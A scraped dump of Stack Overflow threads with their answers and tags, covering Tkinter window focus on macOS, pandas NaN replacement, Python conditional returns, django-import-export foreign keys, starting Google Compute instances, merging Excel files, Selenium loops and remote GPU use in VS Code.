a list of running process IDs before and after you load Tkinter. (Note that these are AppleScript process IDs which seem to bear no relation to their posix counterparts. Go figure.) Then the odd man out will be yours and you move that one to frontmost. (I didn't think that loop at the end would be necessary, but if you simply get every process whose ID is procID, AppleScript apparently returns the one object identified by name, which of course is that non-unique \"Python\", so we are back to square one unless there's something I'm missing.)\nimport Tkinter, subprocess\ndef applescript(script):\n return subprocess.check_output(['/usr/bin/osascript', '-e', script])\ndef procidset():\n return set(applescript(\n 'tell app \"System Events\" to return id of every process whose name is \"Python\"'\n ).replace(',','').split())\nidset = procidset()\nroot = Tkinter.Tk()\nprocid = iter(procidset() - idset).next()\napplescript('''\n tell app \"System Events\"\n repeat with proc in every process whose name is \"Python\"\n if id of proc is ''' + procid + ''' then\n set frontmost of proc to true\n exit repeat\n end if\n end repeat\n end tell''')\n\n", "On Mac OS X PyObjC provides a cleaner and less error prone method than shelling out to osascript:\nimport os\nfrom Cocoa import NSRunningApplication, NSApplicationActivateIgnoringOtherApps\n\napp = NSRunningApplication.runningApplicationWithProcessIdentifier_(os.getpid())\napp.activateWithOptions_(NSApplicationActivateIgnoringOtherApps)\n\n", "Recently, I had the same question on the Mac. 
I have combined several answers using @MagerValp for the Mac and @D K for other systems:\nimport platform\n\nif platform.system() != 'Darwin':\n root.lift()\n root.call('wm', 'attributes', '.', '-topmost', True)\n root.after_idle(root.call, 'wm', 'attributes', '.', '-topmost', False)\nelse:\n import os\n from Cocoa import NSRunningApplication, NSApplicationActivateIgnoringOtherApps\n\n app = NSRunningApplication.runningApplicationWithProcessIdentifier_(os.getpid())\n app.activateWithOptions_(NSApplicationActivateIgnoringOtherApps)\n\nroot.mainloop()\n\n", "Somewhat of a combination of various other methods, this works on OS X 10.11, and Python 3.5.1 running in a venv, and should work on other platforms too. It also targets the app by process id rather than app name.\nfrom tkinter import Tk\nimport os\nimport subprocess\nimport platform\n\n\ndef raise_app(root: Tk):\n root.attributes(\"-topmost\", True)\n if platform.system() == 'Darwin':\n tmpl = 'tell application \"System Events\" to set frontmost of every process whose unix id is {} to true'\n script = tmpl.format(os.getpid())\n output = subprocess.check_call(['/usr/bin/osascript', '-e', script])\n root.after(0, lambda: root.attributes(\"-topmost\", False))\n\nYou call it right before the mainloop() call, like so:\nraise_app(root)\nroot.mainloop()\n\n", "There's a hint on how to make the Tkinter window take focus when you call mainloop() in the Tkinter._test() function.\n# The following three commands are needed so the window pops\n# up on top on Windows...\nroot.iconify()\nroot.update()\nroot.deiconify()\nroot.mainloop()\n\nThis is the cleanest most proper way I've found to do this, but it's only needed for Windows systems.\n", "This answer is to make one Tkinter Window pop up overtop of other Tkinter windows.\nIn my app I have a large window toplevel which calls a much smaller window top2 which initially appears on top of toplevel.\nIf user clicks within toplevel window it gains focus and smothers much smaller top2 window until toplevel window is dragged off of it.\nThe solution is to click the button in toplevel to launch top2 again. The top2 open function knows it is already running so simply lifts it to the top and gives it focus:\ndef play_items(self):\n ''' Play 1 or more songs in listbox.selection(). Define buttons:\n Close, Pause, Prev, Next, Commercial and Intermission\n '''\n\n if self.top2_is_active is True:\n self.top2.focus_force() # Get focus\n self.top2.lift() # Raise in stacking order\n root.update()\n return # Don't want to start playing again\n\n", "On macOS High Sierra, py3.6.4, here is my solution:\ndef OnFocusIn(event):\n if type(event.widget).__name__ == 'Tk':\n event.widget.attributes('-topmost', False)\n\n# Create and configure your root ...\n\nroot.attributes('-topmost', True)\nroot.focus_force()\nroot.bind('<FocusIn>', OnFocusIn)\n\nThe idea is to bring it to the front until user interacts with it, i.e., taking focus.\nI tried the accepted answer, .after_idle(), and .after(). 
They all fail in one case: When I run my script directly from an IDE like PyCharm, the app window will stay behind.\nMy solution works in all the cases that I encountered.\n", "This will lift the window to the front, and also focus on the window.\ndef lift_window(window):\n window.attributes('-topmost',True)\n window.attributes('-topmost',False) # disable the topmost attribute after it is at the front to prevent permanent focus \n window.focus_force() # focus to the window\n\n", "One more line (needed for Python 3.11 and tkinter 8.6):\ndef lift_window(window):\n window.attributes('-topmost', True)\n window.update_idletasks() # get window on top\n window.attributes('-topmost', False) # prevent permanent focus \n window.focus_force() # focus to the window\n\n" ]
[ 111, 46, 31, 6, 4, 4, 4, 3, 2, 1, 0, 0 ]
[]
[]
[ "focus", "python", "tkinter" ]
stackoverflow_0001892339_focus_python_tkinter.txt
Q: Pandas: replacing nan values conditionally within a group I have a dataframe with missing values. for each index in a column group, i want to replace these values seperately. If all of the values in a group are missing, i want to replace the values with 1. If only some of the values are missing, i want to replace it with data from an imputed dataframe dataframe 1 index d0_1 d0_2 d1_1 d1_2 group d0 d0 d1 d1 1 3 3 NaN NaN 2 3 NaN 3 3 dataframe 2 (the imputed one) index d0_1 d0_2 d1_1 d1_2 group d0 d0 d1 d1 1 3 3 2 2 2 3 2 3 3 output: index d0_1 d0_2 d1_1 d1_2 group d0 d0 d1 d1 1 3 3 1 1 2 3 2 3 3 my data is much larger and the groups are larger as well. Ive been struggling now with this for days, i just cant seem to find a working solution my current solution is iterating over all the groups, and using groupby.transform to replace values, but i dont know how to tell the lambda function to take the values from my second data frame, and my current lambda function also doesnt replace all the values with 1 either, instead just returning the old groups with no changes df1 = pd.read_csv("file.txt", sep = "\t", index_col = "T: Protein.Group") def group(a: pd.DataFrame): a_grouped = a.groupby(["group"] , axis=1) return a_grouped def getgroup(a: pd.DataFrame): new_idx = pd.MultiIndex.from_arrays([ a.columns, a.columns.str.extract("(d\d+)_\d+", expand = False) ], names=["index", "group"]) a.columns = new_idx return a df1grp = group(getgroup(df1)) for i in list(df1grg.groups.keys()) df1grp.get_group(i).transform( lambda x: 1 if x.eq(np.nan).all() else x ) A: IIUC: df = df1.mask(df1.groupby('group', axis=1).count() == 0, 1) df = df.where(~df.isna(), df2) >>> df index d0_1 d0_2 d1_1 d1_2 group d0 d0 d1 d1 1 3 3 1 1 2 3 2 3 3 This is assuming the columns are indeed a MultiIndex as you describe, e.g.: >>> df1.columns MultiIndex([('d0_1', 'd0'), ('d0_2', 'd0'), ('d1_1', 'd1'), ('d1_2', 'd1')], names=['index', 'group']) (I initially spent a few minutes making such columns as I thought you had simple Index columns and a first row with the 'group'...)
Pandas: replacing nan values conditionally within a group
I have a dataframe with missing values. for each index in a column group, i want to replace these values seperately. If all of the values in a group are missing, i want to replace the values with 1. If only some of the values are missing, i want to replace it with data from an imputed dataframe dataframe 1 index d0_1 d0_2 d1_1 d1_2 group d0 d0 d1 d1 1 3 3 NaN NaN 2 3 NaN 3 3 dataframe 2 (the imputed one) index d0_1 d0_2 d1_1 d1_2 group d0 d0 d1 d1 1 3 3 2 2 2 3 2 3 3 output: index d0_1 d0_2 d1_1 d1_2 group d0 d0 d1 d1 1 3 3 1 1 2 3 2 3 3 my data is much larger and the groups are larger as well. Ive been struggling now with this for days, i just cant seem to find a working solution my current solution is iterating over all the groups, and using groupby.transform to replace values, but i dont know how to tell the lambda function to take the values from my second data frame, and my current lambda function also doesnt replace all the values with 1 either, instead just returning the old groups with no changes df1 = pd.read_csv("file.txt", sep = "\t", index_col = "T: Protein.Group") def group(a: pd.DataFrame): a_grouped = a.groupby(["group"] , axis=1) return a_grouped def getgroup(a: pd.DataFrame): new_idx = pd.MultiIndex.from_arrays([ a.columns, a.columns.str.extract("(d\d+)_\d+", expand = False) ], names=["index", "group"]) a.columns = new_idx return a df1grp = group(getgroup(df1)) for i in list(df1grg.groups.keys()) df1grp.get_group(i).transform( lambda x: 1 if x.eq(np.nan).all() else x )
[ "IIUC:\ndf = df1.mask(df1.groupby('group', axis=1).count() == 0, 1)\ndf = df.where(~df.isna(), df2)\n\n>>> df\nindex d0_1 d0_2 d1_1 d1_2\ngroup d0 d0 d1 d1\n1 3 3 1 1\n2 3 2 3 3\n\nThis is assuming the columns are indeed a MultiIndex as you describe, e.g.:\n>>> df1.columns\nMultiIndex([('d0_1', 'd0'),\n ('d0_2', 'd0'),\n ('d1_1', 'd1'),\n ('d1_2', 'd1')],\n names=['index', 'group'])\n\n(I initially spent a few minutes making such columns as I thought you had simple Index columns and a first row with the 'group'...)\n" ]
[ 0 ]
[]
[]
[ "dataframe", "pandas", "python" ]
stackoverflow_0074574058_dataframe_pandas_python.txt
Q: python: simplify return statement (trigraph?) Consider the following simple code: import re def my_match(s): if re.match("^[a-zA-Z]+", s): return True else: return False Is there a way to collapse this in a single return statement? In C we could do for example: return match("^[a-zA-Z]+", s) ? true : false; Is there something similar in python? A: A more generell solution would be to use the following code line. It excludes a fit with length 0 as it specificly checks for the None statement. In this case an empty string is impossible but it is more explicit. return re.match("^[a-zA-Z]+", s) is not None A: Python also supports this, although the syntaxes is a little different than most languages. import re def my_match(s): return True if re.match("^[a-zA-Z]+", s) else False In general, the Python syntax is val_when_true if cond else val_when_false, compared to the cond ? val_when_true : val_when_false you see in other languages. In your particular case though, you can just write: import re def my_match(s): return bool(re.match("^[a-zA-Z]+", s)) A: The other answers show the ternary equivalent in Python. But since Python also assigns truthiness to values and expressions, you could simply use: my_match = lambda s : bool(re.match("^[a-zA-Z]+", s)) A: re.match() returns a value that can be evaluated for truthiness. So if you don't need to return the exact values True and False, you can just directly return the result of the match() function: def my_match(s): return re.match("^[a-zA-Z]+", s) And then the caller can say: if my_match(x): ... else: ... Although in this specific case, my_match() becomes a mostly useless wrapper function, and you could just call re.match(...) directly. if re.match(...): ... else: ...
python: simplify return statement (trigraph?)
Consider the following simple code: import re def my_match(s): if re.match("^[a-zA-Z]+", s): return True else: return False Is there a way to collapse this in a single return statement? In C we could do for example: return match("^[a-zA-Z]+", s) ? true : false; Is there something similar in python?
[ "A more generell solution would be to use the following code line. It excludes a fit with length 0 as it specificly checks for the None statement. In this case an empty string is impossible but it is more explicit.\nreturn re.match(\"^[a-zA-Z]+\", s) is not None\n\n", "Python also supports this, although the syntaxes is a little different than most languages.\nimport re\n\ndef my_match(s):\n return True if re.match(\"^[a-zA-Z]+\", s) else False\n\nIn general, the Python syntax is val_when_true if cond else val_when_false, compared to the cond ? val_when_true : val_when_false you see in other languages.\nIn your particular case though, you can just write:\nimport re\n\ndef my_match(s):\n return bool(re.match(\"^[a-zA-Z]+\", s))\n\n", "The other answers show the ternary equivalent in Python. But since Python also assigns truthiness to values and expressions, you could simply use:\nmy_match = lambda s : bool(re.match(\"^[a-zA-Z]+\", s))\n\n", "re.match() returns a value that can be evaluated for truthiness. So if you don't need to return the exact values True and False, you can just directly return the result of the match() function:\ndef my_match(s):\n return re.match(\"^[a-zA-Z]+\", s)\n\nAnd then the caller can say:\nif my_match(x):\n ...\nelse:\n ...\n\nAlthough in this specific case, my_match() becomes a mostly useless wrapper function, and you could just call re.match(...) directly.\nif re.match(...):\n ...\nelse:\n ...\n\n" ]
[ 1, 1, 0, 0 ]
[]
[]
[ "python", "python_3.x" ]
stackoverflow_0074575794_python_python_3.x.txt
Q: Import into tables from Django import_export I am struggling to populate models in Django by using ForeignKey. Let's say we have as in import_export documentation the following example: class Author(models.Model): id = models.BigAutoField(primary_key=True) name = models.CharField(max_length=100) def __str__(self): return self.name class Category(models.Model): id = models.BigAutoField(primary_key=True) name = models.CharField(max_length=100) def __str__(self): return self.name class Book(models.Model): name = models.CharField('Book name', max_length=100) author = models.ForeignKey(Author, blank=True, null=True, ) ... price = models.DecimalField(max_digits=10, decimal_places=2, null=True, blank=True) categories = models.ManyToManyField(Category, blank=True) def __str__(self): return self.name How can I implement import_export module that can check if there is an existing author by name (not by id), that is not case sensitive, and that can generate a new author if it does not exist? As an example, let's say the CSV file looks like: name,author,...,price,categories J.R.R. Tolkien,Lord of the Rings,...,40,["cat1","cat2"] Also, if there is a DateTime field, how to generate that in ForeignKey table? NOTE: I know about use of natural key: from import_export.fields import Field from import_export.widgets import ForeignKeyWidget class AuthorManager(models.Manager): def get_by_natural_key(self, name): return self.get(name=name) class Author(models.Model): objects = AuthorManager() name = models.CharField(max_length=100) birthday = models.DateTimeField(auto_now_add=True) def natural_key(self): return (self.name,) # Only the author field uses natural foreign keys. class BookResource(resources.ModelResource): author = Field( column_name = "author", attribute = "author", widget = ForeignKeyWidget(Author, use_natural_foreign_keys=True) ) class Meta: model = Book But I am not sure how to check for UPPER or lower case in the CSV. And how to generate a new Author if it does not exist. A: There are a couple of ways of creating an FK relation during import if it does not already exist. Option 1 - override the before_import_row() method class BookResource(resources.ModelResource): # note use of 'iexact' for case-insensitive lookup def before_import_row(self, row, **kwargs): author_name = row["author"] Author.objects.get_or_create(name__iexact=author_name, defaults={"name": author_name}) # other code omitted Option 2 - subclass ForeignKeyWidget Simply subclass ForeignKeyWidget and implement the check in clean(): class AuthorForeignKeyWidget(widgets.ForeignKeyWidget): def clean(self, value, row=None, **kwargs): author, created = Author.objects.get_or_create(name__iexact=value, defaults={"name": value}) return author class BookResource(resources.ModelResource): author = fields.Field( column_name='author', attribute='author', widget=AuthorForeignKeyWidget(Author)) # other code omitted Either way will work fine. I would personally use option 2. Also, if there is a DateTime field, how to generate that in ForeignKey table? Since you are calling Author.objects.get_or_create() you can add a date if you wish, for example: author, created = Author.objects.get_or_create(name__iexact=value, defaults={"name": value, "created": timezone.now()}) If using natural keys you can adjust the code as desired. Related answer about creating in bulk mode
Import into tables from Django import_export
I am struggling to populate models in Django by using ForeignKey. Let's say we have as in import_export documentation the following example: class Author(models.Model): id = models.BigAutoField(primary_key=True) name = models.CharField(max_length=100) def __str__(self): return self.name class Category(models.Model): id = models.BigAutoField(primary_key=True) name = models.CharField(max_length=100) def __str__(self): return self.name class Book(models.Model): name = models.CharField('Book name', max_length=100) author = models.ForeignKey(Author, blank=True, null=True, ) ... price = models.DecimalField(max_digits=10, decimal_places=2, null=True, blank=True) categories = models.ManyToManyField(Category, blank=True) def __str__(self): return self.name How can I implement import_export module that can check if there is an existing author by name (not by id), that is not case sensitive, and that can generate a new author if it does not exist? As an example, let's say the CSV file looks like: name,author,...,price,categories J.R.R. Tolkien,Lord of the Rings,...,40,["cat1","cat2"] Also, if there is a DateTime field, how to generate that in ForeignKey table? NOTE: I know about use of natural key: from import_export.fields import Field from import_export.widgets import ForeignKeyWidget class AuthorManager(models.Manager): def get_by_natural_key(self, name): return self.get(name=name) class Author(models.Model): objects = AuthorManager() name = models.CharField(max_length=100) birthday = models.DateTimeField(auto_now_add=True) def natural_key(self): return (self.name,) # Only the author field uses natural foreign keys. class BookResource(resources.ModelResource): author = Field( column_name = "author", attribute = "author", widget = ForeignKeyWidget(Author, use_natural_foreign_keys=True) ) class Meta: model = Book But I am not sure how to check for UPPER or lower case in the CSV. And how to generate a new Author if it does not exist.
[ "There are a couple of ways of creating an FK relation during import if it does not already exist.\nOption 1 - override the before_import_row() method\nclass BookResource(resources.ModelResource):\n\n # note use of 'iexact' for case-insensitive lookup\n def before_import_row(self, row, **kwargs):\n author_name = row[\"author\"]\n Author.objects.get_or_create(name__iexact=author_name, \n defaults={\"name\": author_name})\n\n # other code omitted\n\nOption 2 - subclass ForeignKeyWidget\nSimply subclass ForeignKeyWidget and implement the check in clean():\nclass AuthorForeignKeyWidget(widgets.ForeignKeyWidget):\n\n def clean(self, value, row=None, **kwargs):\n author, created = Author.objects.get_or_create(name__iexact=value,\n defaults={\"name\": value})\n return author\n\n\nclass BookResource(resources.ModelResource):\n author = fields.Field(\n column_name='author',\n attribute='author',\n widget=AuthorForeignKeyWidget(Author))\n\n # other code omitted\n\nEither way will work fine. I would personally use option 2.\n\nAlso, if there is a DateTime field, how to generate that in ForeignKey table?\n\nSince you are calling Author.objects.get_or_create() you can add a date if you wish, for example:\nauthor, created = Author.objects.get_or_create(name__iexact=value, \n defaults={\"name\": value, \"created\": timezone.now()})\n\nIf using natural keys you can adjust the code as desired.\nRelated answer about creating in bulk mode\n" ]
[ 1 ]
[]
[]
[ "django", "django_import_export", "python" ]
stackoverflow_0074562802_django_django_import_export_python.txt
Q: Starting a Google Compute instance with Python I am trying to start a Google Compute instance with the Google API Python Client Library. This is so that a cheap instance (running on a single core) can periodically start and stop a more expensive instance (with many cores) periodically, to keep costs down. I have successfully installed the different components and run Google's example script create_instance.py (which creates an instances, runs a startup script, and deletes the instance). Inspecting the PyDoc reference for the Compute Engine API, and cross-referencing how the other instances() functions work in the create_instance.py example, I would expect the start instance command to be: python compute.instances().start(project=*, zone=*, instance=*).execute() The above command gives me the error "An expression was expected after '('. at line:1 char:34" - this is the first parenthesis. a. What have I done wrong? b. Is using the Google API with Python a good way to start instances from other instances, programmatically? A: Below is the code needed to start a compute engine instance from googleapiclient import discovery service = discovery.build('compute', 'v1') print('VM Instance starting') # Project ID for this request. project = 'project_name' # The name of the zone for this request. zone = 'zone_value' # Name of the instance resource to start. instance = 'instance_name' request = service.instances().start(project=project, zone=zone, instance=instance) response = request.execute() print('VM Instance started') This is the code I used for starting my VM instance from a cloud function. An important thing to note here is that this can only start an instance if the instance is in stopped state, which suits my requirements perfectly. A: Generally I would expect you would need to import the api library with an import statement or perhaps a runtime flag (-m somemodule?). Running a line of python directly from the command line is usually not the best way to proceed. Instead Google provides the gcloud command line tool. An authentication/login function is usually called before sending the API actual commands. On a Google VM, this can be either an id/private key or a blank id/key if the VM is specifically authorized to call the API or act as a specific account. This authorization can be set up from the compute engine web control panel when creating a Google VM the first time. On an external VM, it will need an id/private key to supply to the Google API. So, a one liner in python probably won't work as it is missing this step. The compute.instances().start() function takes required parameters to start a specific instance that has stopped. That means: the VM instance has been created previously the VM instance is in the stopped state the instance to be restarted is identified by a specific project id, a (geo) zone, and an instance name that is supplied in the call to start From Google Cloud Python Documentation start(project=, zone=, instance=*) Starts an instance that was stopped using the instances().stop method. For more information, see Restart an instance. Args: project: string, Project ID for this request. (required) zone: string, The name of the zone for this request. (required) instance: string, Name of the instance resource to start. (required) ... 
A: from google.cloud import compute_v1 project = "" zone = "" instance_client = compute_v1.InstancesClient.from_service_account_file("ServiceAccount.json") instance_list = instance_client.list(project=project, zone=zone) for instance in instance_list: print(instance.name) instance_client.start(project=project, zone=zone, instance=instance.name) Requires iam role Compute Admin Source available here: https://github.com/googleapis/python-compute
Starting a Google Compute instance with Python
I am trying to start a Google Compute instance with the Google API Python Client Library. This is so that a cheap instance (running on a single core) can periodically start and stop a more expensive instance (with many cores) periodically, to keep costs down. I have successfully installed the different components and run Google's example script create_instance.py (which creates an instances, runs a startup script, and deletes the instance). Inspecting the PyDoc reference for the Compute Engine API, and cross-referencing how the other instances() functions work in the create_instance.py example, I would expect the start instance command to be: python compute.instances().start(project=*, zone=*, instance=*).execute() The above command gives me the error "An expression was expected after '('. at line:1 char:34" - this is the first parenthesis. a. What have I done wrong? b. Is using the Google API with Python a good way to start instances from other instances, programmatically?
[ "Below is the code needed to start a compute engine instance\nfrom googleapiclient import discovery\n\nservice = discovery.build('compute', 'v1')\nprint('VM Instance starting')\n\n# Project ID for this request.\nproject = 'project_name' \n\n# The name of the zone for this request.\nzone = 'zone_value' \n\n# Name of the instance resource to start.\ninstance = 'instance_name'\n\nrequest = service.instances().start(project=project, zone=zone, instance=instance)\nresponse = request.execute()\n\nprint('VM Instance started')\n\nThis is the code I used for starting my VM instance from a cloud function. \nAn important thing to note here is that this can only start an instance if the instance is in stopped state, which suits my requirements perfectly.\n", "\nGenerally I would expect you would need to import the api library with an import statement or perhaps a runtime flag (-m somemodule?). Running a line of python directly from the command line is usually not the best way to proceed. Instead Google provides the gcloud command line tool.\nAn authentication/login function is usually called before sending the API actual commands. On a Google VM, this can be either an id/private key or a blank id/key if the VM is specifically authorized to call the API or act as a specific account. This authorization can be set up from the compute engine web control panel when creating a Google VM the first time. On an external VM, it will need an id/private key to supply to the Google API. So, a one liner in python probably won't work as it is missing this step. \nThe compute.instances().start() function takes required parameters to start a specific instance that has stopped. That means:\n\nthe VM instance has been created previously\nthe VM instance is in the stopped state\nthe instance to be restarted is identified by a specific project id, a (geo) zone, and an instance name that is supplied in the call to start\n\n\nFrom Google Cloud Python Documentation\n\nstart(project=, zone=, instance=*) Starts an instance that was\n stopped using the instances().stop method. For more\n information, see Restart an instance.\nArgs: project: string, Project ID for this request. (required)\n zone: string, The name of the zone for this request. (required)\n instance: string, Name of the instance resource to start. (required)\n...\n\n", "from google.cloud import compute_v1\n\nproject = \"\"\nzone = \"\"\ninstance_client = compute_v1.InstancesClient.from_service_account_file(\"ServiceAccount.json\")\ninstance_list = instance_client.list(project=project, zone=zone)\nfor instance in instance_list:\n print(instance.name)\n instance_client.start(project=project, zone=zone, instance=instance.name)\n\nRequires iam role Compute Admin\nSource available here: https://github.com/googleapis/python-compute\n" ]
[ 5, 3, 0 ]
[ "I used the code shared by @user570778, and for me it worked fine.\n`from googleapiclient import discovery\nservice = discovery.build('compute', 'v1')\nprint('VM Instance starting')\nProject ID for this request.\nproject = 'project_name'\nThe name of the zone for this request.\nzone = 'zone_value'\nName of the instance resource to start.\ninstance = 'instance_name'\nrequest = service.instances().start(project=project, zone=zone, instance=instance)\nresponse = request.execute()\nprint('VM Instance started')\n`\nI'm wondering, is it possible to start multiples instance in the same function?\n" ]
[ -2 ]
[ "google_api_python_client", "google_compute_engine", "python" ]
stackoverflow_0045207202_google_api_python_client_google_compute_engine_python.txt
Q: Importing multiple excel files and combining into dataframe I am trying to import many excel files (around 400) into one dataframe from a folder but I seem to be running into an error. The files I want from my folder are names filename followed by a date - "filename_yyyy_mm_dd.xlsx". I want to keep the header as the files have all same columns for different dates. My current code is: import glob import pandas as pd import os path = r"C:\Users\..." my_files = glob.glob(os.path.join(path, "filename*.xlsx")) file_li = [] for filename in my_files: df = pd.read_excel(filename, index_col=None, header=1) file_li.append(df) frame = pd.concat(file_li, axis=0, ignore_index=True) When I call my frame I dont get any response? Am I doing something wrong in the way I am calling the file name? Update: My excel files look like this: Column 1 Column 2 Column 3 Column 4 Column 5 Column 6 Column 7 Column 8 Column 9 Column 10 Column 11 Column 12 Column 13 Column 14 Date SREC-MD SREC Feb-25 MDX F 85 0 0 8086 02/25/2025 20107 with around 300-400 rows. My output has captured the 14 columns but it has added a lot more as doing frame.info() shows I have 922 columns. Update 2: A: Instead of using concat, you could try reading the files into a df and then append them to one combined csv using mode='a'. Then read the combined csv. for filename in my_files: df = pd.read_excel(filename, index_col=None, header=1) df.to_csv('combined.csv', mode='a', header=False) df = pd.read_csv('combined.csv') A: It's hard to tell why you're getting the extra columns but you can try this : import glob import pandas as pd import os path = r"C:\Users\..." my_files = glob.glob(os.path.join(path, "filename*.xlsx")) file_li = [] for filename in my_files: df = pd.read_excel(filename, index_col=None, header=None) file_li.append(df) frame = ( pd.concat(file_li, axis=0, ignore_index=True) .dropna(how="all") #to get rid of the eventual extra rows abobe each header .drop_duplicates() #to get rid of the cumulated duplicated headers .T.set_index(0).T #to make the first row as header of the dataframe ) I suggest you however to check if there is any missing rows in frame compared to your spreadsheets.
Importing multiple excel files and combining into dataframe
I am trying to import many excel files (around 400) into one dataframe from a folder but I seem to be running into an error. The files I want from my folder are names filename followed by a date - "filename_yyyy_mm_dd.xlsx". I want to keep the header as the files have all same columns for different dates. My current code is: import glob import pandas as pd import os path = r"C:\Users\..." my_files = glob.glob(os.path.join(path, "filename*.xlsx")) file_li = [] for filename in my_files: df = pd.read_excel(filename, index_col=None, header=1) file_li.append(df) frame = pd.concat(file_li, axis=0, ignore_index=True) When I call my frame I dont get any response? Am I doing something wrong in the way I am calling the file name? Update: My excel files look like this: Column 1 Column 2 Column 3 Column 4 Column 5 Column 6 Column 7 Column 8 Column 9 Column 10 Column 11 Column 12 Column 13 Column 14 Date SREC-MD SREC Feb-25 MDX F 85 0 0 8086 02/25/2025 20107 with around 300-400 rows. My output has captured the 14 columns but it has added a lot more as doing frame.info() shows I have 922 columns. Update 2:
[ "Instead of using concat, you could try reading the files into a df and then append them to one combined csv using mode='a'. Then read the combined csv.\nfor filename in my_files:\n df = pd.read_excel(filename, index_col=None, header=1)\n df.to_csv('combined.csv', mode='a', header=False)\n\n\ndf = pd.read_csv('combined.csv')\n\n", "It's hard to tell why you're getting the extra columns but you can try this :\nimport glob\nimport pandas as pd\nimport os\n\n\npath = r\"C:\\Users\\...\"\n\nmy_files = glob.glob(os.path.join(path, \"filename*.xlsx\"))\n\nfile_li = []\n\nfor filename in my_files:\n df = pd.read_excel(filename, index_col=None, header=None)\n file_li.append(df)\n \nframe = (\n pd.concat(file_li, axis=0, ignore_index=True)\n .dropna(how=\"all\") #to get rid of the eventual extra rows abobe each header\n .drop_duplicates() #to get rid of the cumulated duplicated headers\n .T.set_index(0).T #to make the first row as header of the dataframe\n )\n\nI suggest you however to check if there is any missing rows in frame compared to your spreadsheets.\n" ]
[ 0, 0 ]
[]
[]
[ "excel", "pandas", "python" ]
stackoverflow_0074574921_excel_pandas_python.txt
Q: Python loops, need some advice i trying to create a small program usign python and i need some help about python loops. this small program will automates a fairly boring repetitive task. I use module : selenium, time and pyautogui here is the piece of code that i want to repeat until it no longer finds a certain element on the web page : btnOptions = driver.find_element(By.XPATH, "/html/body/div[1]/div/div[1]/div/div[5]/div/div/div[3]/div/div/div[1]/div[1]/div/div/div[4]/div[2]/div/div[2]/div[3]/div[1]/div/div/div/div/div/div/div/div/div/div/div[8]/div/div[2]/div/div[3]/div/div") btnOptions.click() time.sleep(1) pyautogui.press("down", presses=10) pyautogui.press("enter") time.sleep(1) btn_move = driver.find_element(By.XPATH, "/html/body/div[1]/div/div[1]/div/div[6]/div/div/div[1]/div/div[2]/div/div/div/div/div/div/div[3]/div/div/div/div[1]") btn_move.click() as long as the btn_option is found, the program must continue otherwise it must stop. I can't find a solution, if anyone can help me it would be very appreciated. thanks a lot i tried several loops but every time i get an error of course, I'm just new to coding in python :/ A: I've done a similar task. You may try this: while True: try: btnOptions = driver.find_element(By.XPATH, "/html/body/div[1]/div/div[1]/div/div[5]/div/div/div[3]/div/div/div[1]/div[1]/div/div/div[4]/div[2]/div/div[2]/div[3]/div[1]/div/div/div/div/div/div/div/div/div/div/div[8]/div/div[2]/div/div[3]/div/div") btnOptions.click() time.sleep(1) pyautogui.press("down", presses=10) pyautogui.press("enter") time.sleep(1) btn_move = driver.find_element(By.XPATH, "/html/body/div[1]/div/div[1]/div/div[6]/div/div/div[1]/div/div[2]/div/div/div/div/div/div/div[3]/div/div/div/div[1]") btn_move.click() except NoSuchElementException: break
Python loops, need some advice
i trying to create a small program usign python and i need some help about python loops. this small program will automates a fairly boring repetitive task. I use module : selenium, time and pyautogui here is the piece of code that i want to repeat until it no longer finds a certain element on the web page : btnOptions = driver.find_element(By.XPATH, "/html/body/div[1]/div/div[1]/div/div[5]/div/div/div[3]/div/div/div[1]/div[1]/div/div/div[4]/div[2]/div/div[2]/div[3]/div[1]/div/div/div/div/div/div/div/div/div/div/div[8]/div/div[2]/div/div[3]/div/div") btnOptions.click() time.sleep(1) pyautogui.press("down", presses=10) pyautogui.press("enter") time.sleep(1) btn_move = driver.find_element(By.XPATH, "/html/body/div[1]/div/div[1]/div/div[6]/div/div/div[1]/div/div[2]/div/div/div/div/div/div/div[3]/div/div/div/div[1]") btn_move.click() as long as the btn_option is found, the program must continue otherwise it must stop. I can't find a solution, if anyone can help me it would be very appreciated. thanks a lot i tried several loops but every time i get an error of course, I'm just new to coding in python :/
[ "I've done a similar task. You may try this:\nwhile True:\n try:\n btnOptions = driver.find_element(By.XPATH, \"/html/body/div[1]/div/div[1]/div/div[5]/div/div/div[3]/div/div/div[1]/div[1]/div/div/div[4]/div[2]/div/div[2]/div[3]/div[1]/div/div/div/div/div/div/div/div/div/div/div[8]/div/div[2]/div/div[3]/div/div\")\n btnOptions.click()\n time.sleep(1)\n pyautogui.press(\"down\", presses=10)\n pyautogui.press(\"enter\")\n time.sleep(1)\n btn_move = driver.find_element(By.XPATH, \"/html/body/div[1]/div/div[1]/div/div[6]/div/div/div[1]/div/div[2]/div/div/div/div/div/div/div[3]/div/div/div/div[1]\")\n btn_move.click()\n except NoSuchElementException:\n break\n\n" ]
[ 0 ]
[]
[]
[ "loops", "python" ]
stackoverflow_0074575175_loops_python.txt
Q: Is there a way to use another computer GPU in vscode notebook?
I have laptop A with an Nvidia 2060 and desktop B with an Nvidia 3080 in my room. All settings, files, and notebooks are on laptop A. Laptop A and desktop B are on the same network (with a network hub).
Is it possible to run notebooks (that contain TensorFlow neural network parts) on desktop B's GPU while working from laptop A?
I have seen people using Jupyter, Docker and other tools to use a remote GPU, but is there a way to do it from VS Code so that other students who are not familiar with this can reproduce it easily?
Thank you very much
A: I am not sure if you will get it running, but try this:
https://code.visualstudio.com/docs/remote/vscode-server
Is there a way to use another computer GPU in vscode notebook?
I have laptop A with an Nvidia 2060 and desktop B with an Nvidia 3080 in my room. All settings, files, and notebooks are on laptop A. Laptop A and desktop B are on the same network (with a network hub).
Is it possible to run notebooks (that contain TensorFlow neural network parts) on desktop B's GPU while working from laptop A?
I have seen people using Jupyter, Docker and other tools to use a remote GPU, but is there a way to do it from VS Code so that other students who are not familiar with this can reproduce it easily?
Thank you very much
[ "I am not sure, if you get it running but try this:\nhttps://code.visualstudio.com/docs/remote/vscode-server\n" ]
[ 0 ]
[]
[]
[ "python" ]
stackoverflow_0074576049_python.txt
